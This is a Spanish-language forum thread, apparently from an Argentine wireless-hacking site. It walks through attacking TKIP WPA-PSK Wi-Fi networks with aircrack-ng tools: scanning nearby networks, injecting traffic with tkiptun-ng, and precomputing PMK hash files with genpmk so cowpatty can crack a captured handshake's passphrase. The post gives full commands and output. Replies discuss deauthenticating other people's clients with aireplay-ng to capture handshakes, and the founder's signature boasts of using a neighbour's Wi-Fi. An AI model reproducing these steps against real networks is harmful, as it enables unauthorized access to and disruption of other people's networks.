14 de Diciembre de 2017, 09:22:46 pm
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)  (Leído 20482 veces)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.117
  • Reputación: +247/-4
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)
« en: 18 de Febrero de 2011, 11:00:55 am »
PoC DoS en redes Wifi WPA-PSK (TKIP)

Con el objetivo de desasociar un equipo con su correspondiente punto de acceso en redes con WPA es posible inyectar trí¡fico provocando una denegaciín de servicio (DoS) en el AP y así­ conseguir desasociar el resto de equipos conectados.

En este artí­culo se va a mostrar una prueba de concepto de címo romper el protocolo TKIP en las redes Wi-Fi, WPA-PSK. Para ello, se va a utilizar la suite de herramientas de seguridad de redes Wi-Fi, aircrack-ng. A travís de este ataque no es posible recuperar la contraseíña pero si es posible generar una denegaciín de servicio en la red. Para su logro, es necesario que el punto de acceso tenga habilitado el servicio QoS, y que haya un cliente asociado a la red.

El protocolo TKIP (Temporal Key Integrity Protocol) se emplea en las redes Wi-Fi, WPA-PSK. Su objetivo es mejorar el sistema de cifrado de la clave de la red. En principio, fue diseíñado para sustituir el sistema de cifrado WEP sin necesidad de actualizar el hardware. íšnicamente era necesario actualizar el firmware. WPA2 mejora las caracterí­sticas de seguridad de WPA. Por ello es recomendable emplear el sistema de cifrado WPA2 para proteger las redes Wi-Fi. Antes de comenzar, es necesario configurar la tarjeta de red Wi-Fi en modo “Monitor”. En primer lugar, hay que localizar el objetivo:

Código: [Seleccionar]
$ airodump-ng ath1 
ath1 – interfaz de red Wi-Fi ath1

Citar
CH 7 ][ BAT: 1 hour 54 mins ][ Elapsed: 4 s ][ 2010-01-04 20:24
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:D2:15:01:BC 2 3 0 0 11 54e WPA TKIP PSK Vodafone01BB
00:60:B3:F4:14:31 26 13 0 0 7 54 . WPA TKIP PSK fastbreak
00:14:C1:38:F5:13 43 7 0 0 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes

Una vez que se ha detectado el objetivo hay que ponerle cerco. Para ello:

Código: [Seleccionar]
$ airodump-ng ath1 --bssid 00:14:C1:38:F5:13 --channel 11 
ath1 – Interfaz de red Wi-Fi ath1

--bssid – direcciín MAC del punto de acceso.
--channel – Canal en el que emite el punto de acceso.

Citar
CH 11 ][ BAT: 2 hours 12 mins ][ Elapsed: 1 min ][ 2010-01-04 20:01 ][ WPA handshake: 00:14:C1:38:F5:13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:C1:38:F5:13 46 100 883 10 0 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes
00:14:C1:38:F5:13 00:C0:A8:E6:68:97 26 1e-54e 0 11

Ahora es el momento de lanzar el ataque. En otro terminal:

Código: [Seleccionar]
$ tkiptun-ng ath1 -a 00:14:C1:38:F5:13 -e hacktimes -h 00:C0:A8:E6:68:97 -x 1024
ath1 – Interfaz de red Wi-Fi ath1

-a – direcciín MAC del punto de acceso.
-e – ESSID de la red Wi-Fi.
-h – direcciín MAC del cliente asociado.
-x 1024 – Inyectar 1024 paquetes por segundo.

Citar
The interface MAC (00:15:6D:54:0C:70) doesn't match the specified MAC (-h).
ifconfig ath1 hw ether 00:C0:A8:E6:68:97
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
20:02:06 Michael Test: Successful
20:02:06 Waiting for beacon frame (BSSID: 00:14:C1:38:F5:13) on channel 11
20:02:06 Found specified AP
20:02:06 WPA handshake: 00:14:C1:38:F5:13 capturedA8:E6:68:97] [ 0| 0 ACKs]

20:02:07 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0104-200233.cap
20:02:33 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0104-200233.cap
20:02:33 Got the answer!
20:02:33 Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.

Sent 1127089 packets, current guess: 8E...

Al volver al terminal anterior se observa la inyecciín de paquetes, lo que permitirí¡ provocar la denegaciín de servicio:

Citar
CH 11 ][ BAT: 1 hour 35 mins ][ Elapsed: 21 mins ][ 2010-01-04 20:23 ][ WPA handshake: 00:14:C1:38:F5:13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:C1:38:F5:13 35 100 11929 81283 65 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes
00:14:C1:38:F5:13 00:C0:A8:E6:68:97 29 1e-54e 0 81303

Recordamos una vez obtenida la clave del protocolo WPA-PSK(TKIP) las conclusiones que obtuvimos.

Como todo proceso aquí­ existen 2 problemas, que pasaremos a comentar:

+Tiempo: mí¡s de 5 horas
+Rate: 172 palabras/segundo

El tiempo que se tarda en completar un fichero de mí¡s de 4 millones de entradas, que no es mucho, es excesivo y es debido al rate o nímero de palabras verificadas por segundo.

Para acelerar este proceso es necesario precalcular el PMK, para ello podemos utilizar la utilidad genpmk de Cowpatty.

Cowpatty es una herramienta especí­fica para la ruptura del protocolo WPA-PSK(TKIP) que podrí­amos haber empleado en la primera parte del articulo.
Teniendo en cuenta que la generaciín del PSK se realiza de la siguiente manera:

Código: [Seleccionar]
PSK = PMK = PBKDF2 (frase, SSID, longitud SSID 4096, 256)

El problema al que nos enfrentamos a la hora de atacar el protocolo WPA con diccionarios de texto plano es que, como se pudo observar, es un proceso exageradamente lento. Algunos pensarí¡n que un ataque offline de mí¡s 5 horas es muy poco, pero teniendo en cuenta que el diccionario era de apenas 4 millones de entradas cambia un poco la perspectiva.

Como podemos observar en la fírmula anterior, el PMK esta compuesto por una serie de valores o atributos donde el SSID y la longitud del mismo entre otros son siempre los mismos para un mismo dispositivo.

Siendo esto así­ podremos precalcular un hash PMK donde solo se compare el valor cambiante, es decir, la clave.

Este proceso como el que se describe en el artí­culo anterior no esta exento de problemas ya que, como os habríis dado cuenta, es necesario generar el fichero de hash para cada ESSID, siendo imposible la reutilizaciín del mismo.

Por ello, la generaciín de un fichero de hash para un ESSID no genírico o por defecto es mí¡s larga y costosa que el propio ataque a travís de un diccionario de texto plano.
¿Donde esta la gracia entonces? Es la pregunta que muchos se estarí¡n haciendo en estos momentos, pero la realidad es otra si tenemos en cuenta los miles de puntos de acceso que vienen con el ESSID por defecto, ya sea del fabricante o del ISP. Entonces ¿y si encontramos o nos ponemos a generar ficheros de hash con nombres de ESSID por defecto?

Probablemente nunca podremos recopilar todos los ESSID por defecto y menos aín generarlos con un diccionario de mí¡s de 50 millones de entradas, tardarí­amos toda una vida y parte de la otra. De ahí­ la importancia de compartir este tipo de ficheros.

A continuaciín mostraremos como generar los ficheros de hash y hacer uso de las mismas. En nuestro caso, y por seguir el hilo del artí­culo anterior, precalcularemos el PMK para cada una de las entradas del diccionario con el ESSID HACKTIMES.

Generar el fichero:

Código: [Seleccionar]
# genpmk –f ModlokHacktimesDICCsrt.txt –d HACKTIMES_COW –s HACKTIMES

Opciín -f: Diccionario.
Opciín -d: Nombre del fichero de hash que se generarí¡.
Opciín -s: El Essid.

Ejecuciín del ataque:

Código: [Seleccionar]
# cowpatty -r pskcrack-01.cap -d HACKTIMES_COW -s HACKTIMES

Opciín -r: Fichero *.cap donde capturamos el handshake con el airodump.
Opciín -d: Nombre del fichero generado con la utilidad genpmk.
Opciín -s: El Essid.

Citar
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack. Please be patient.
key no. 100000: í’íí“íííˆíŽí•í”í˜í“í‘
key no. 200000: after-written
…
The PSK is "ZinedineZidane".
3586552 passphrases tested in 50.24 seconds: 71385.42 passphrases/second

Las previsiones han sido mejores que las que esperí¡bamos, que eran de unas 20000 palabras por segundo. Como se puede observar ha testeado 3 millones y medio de claves en 50 segundos, muy por debajo de las mí¡s de 5 horas de la vez anterior.
« Última modificación: 17 de Febrero de 2012, 01:27:27 pm por Ò³Ò²Ò³ Dëmon Ò³Ò²Ò³ »
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado chelopapo

  • Mensajes: 136
  • Reputación: +0/-1
  • Newbie
  • awards Usuario con más de 100 Posts!
    • Awards
Re:Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)
« Respuesta #1 en: 12 de Abril de 2012, 07:52:52 pm »
con este atake puedo hacer que el cliente se desconecte del AP? y lograr asi que le pida el handshake nuevamente al querer reconectarse? pregunto porque asi capas que usando el wepcrackgui pueda capturar ese handshake asi no presio esperar a que alguien venga a conectarse para poder capturarl el handshake¿
  • Antenas: por defecto 4dbi
  • Sistemas Operativos: Windows, Ubuntu
  • Sistemas Operativos que utilizo para Auditar: Airbuntu
  • Dispositivos Inalambricos: TP-Link TL722N

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.117
  • Reputación: +247/-4
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)
« Respuesta #2 en: 12 de Abril de 2012, 08:01:06 pm »
con este atake puedo hacer que el cliente se desconecte del AP? y lograr asi que le pida el handshake nuevamente al querer reconectarse?

eso lo haces con el aireplay-ng, es como un ataque DDoS al usuario.
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado chelopapo

  • Mensajes: 136
  • Reputación: +0/-1
  • Newbie
  • awards Usuario con más de 100 Posts!
    • Awards
Re:Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)
« Respuesta #3 en: 12 de Abril de 2012, 09:03:02 pm »
eso lo haces con el aireplay-ng, es como un ataque DDoS al usuario.

impecable muchas gracias! me pongo a ver sobre el tema
  • Antenas: por defecto 4dbi
  • Sistemas Operativos: Windows, Ubuntu
  • Sistemas Operativos que utilizo para Auditar: Airbuntu
  • Dispositivos Inalambricos: TP-Link TL722N

Desconectado Mosaiko

  • Usuario
  • *
  • Mensajes: 198
  • Reputación: +11/-15
  • Usuario
  • awards Usuario con más de 100 Posts! Usuario Registrado
    • Wifi-Speed - Internet e Informática
    • Awards
Re:Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)
« Respuesta #4 en: 13 de Abril de 2012, 04:18:57 am »
Demon podes hacer un video de como hacerlo en beini? o en Air Ubuntu Pegasus V5?  :o voy a intentarlo ya que para diccionarios wpa soy el mejor ;)
  • Antenas: Omnidireccional HyperLink 15dbi, Tipo Panel 14dBi
  • Sistemas Operativos: Microsoft Windows XP
  • Sistemas Operativos que utilizo para Auditar: beini
  • Dispositivos Inalambricos: Kozumi Air Force One 2, TP-Link TL-WN7200N, TP-Link TL-WN722N, Ubiquiti Nano Loco M2, Ubiquiti Nanostation M2

Desconectado makyavelo

  • Usuario
  • *
  • Mensajes: 14
  • Reputación: +7/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)
« Respuesta #5 en: 14 de Abril de 2012, 02:50:49 pm »
Demon podes hacer un video de como hacerlo en beini? o en Air Ubuntu Pegasus V5?  :o voy a intentarlo ya que para diccionarios wpa soy el mejor ;)

Se sumo a la iniciativa... Estaria bueno como para que tengamos mas claro todo

Desconectado Mosaiko

  • Usuario
  • *
  • Mensajes: 198
  • Reputación: +11/-15
  • Usuario
  • awards Usuario con más de 100 Posts! Usuario Registrado
    • Wifi-Speed - Internet e Informática
    • Awards
Re:Rompiendo el protocolo WPA con clave precompartida (PSK) y (TKIP)
« Respuesta #6 en: 15 de Abril de 2012, 12:00:25 am »
es que hay que si sabe o quiere hacerlo... lo mejor es que se tome el tiempo para que lo haga claro y extenso explicado paso a paso descendiendo a un lenguaje comun para todos aquellos que no poseen ni un 5% de su conocimiento... sin pasar por alto las variante posible de desarrollo de dicho acto...  siempre cuando sea posible... :) 
  • Antenas: Omnidireccional HyperLink 15dbi, Tipo Panel 14dBi
  • Sistemas Operativos: Microsoft Windows XP
  • Sistemas Operativos que utilizo para Auditar: beini
  • Dispositivos Inalambricos: Kozumi Air Force One 2, TP-Link TL-WN7200N, TP-Link TL-WN722N, Ubiquiti Nano Loco M2, Ubiquiti Nanostation M2